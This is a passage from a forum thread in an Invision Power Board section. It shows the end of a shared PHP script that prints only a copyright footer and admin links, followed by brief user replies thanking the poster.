echo "<br /><br /></tr></td>";
break;
}
echo "<tr><td colspan='3' align='center' id='copy'>Invision Power Board © 2005 <a href='http://www.invisionpower.com' target='_blank'>Invision Power Services, Inc.</a><br><br>( <a href='" . BOARD_URL . "/index.php'>Board URL</a> | <a href='" . BOARD_URL . "/admin.php'>Admin CP</a> )<br> ;;</td></tr></table></body></html><!-- Keith's copy -->";
?>
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Apr 11, 2009 7:00 am |
|
|
| ThinSmoke |
| Advanced user |
|
| |
| Joined: Nov 15, 2008 |
| Posts: 55 |
|
|
|
|
|
|
|
| Very nice share, thx alot :3 |
|
|
|
|
| Posted: Wed May 06, 2009 1:56 pm |
|
|
| Dope-R |
| Beginner |
|
| |
| Joined: May 06, 2009 |
| Posts: 1 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Thu May 21, 2009 9:01 am |
|
|
| ThinSmoke |
| Advanced user |
|
| |
| Joined: Nov 15, 2008 |
| Posts: 55 |
|
|
|
|
|
|
|
| Can still use it as a reference of lot of stuff : ) |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
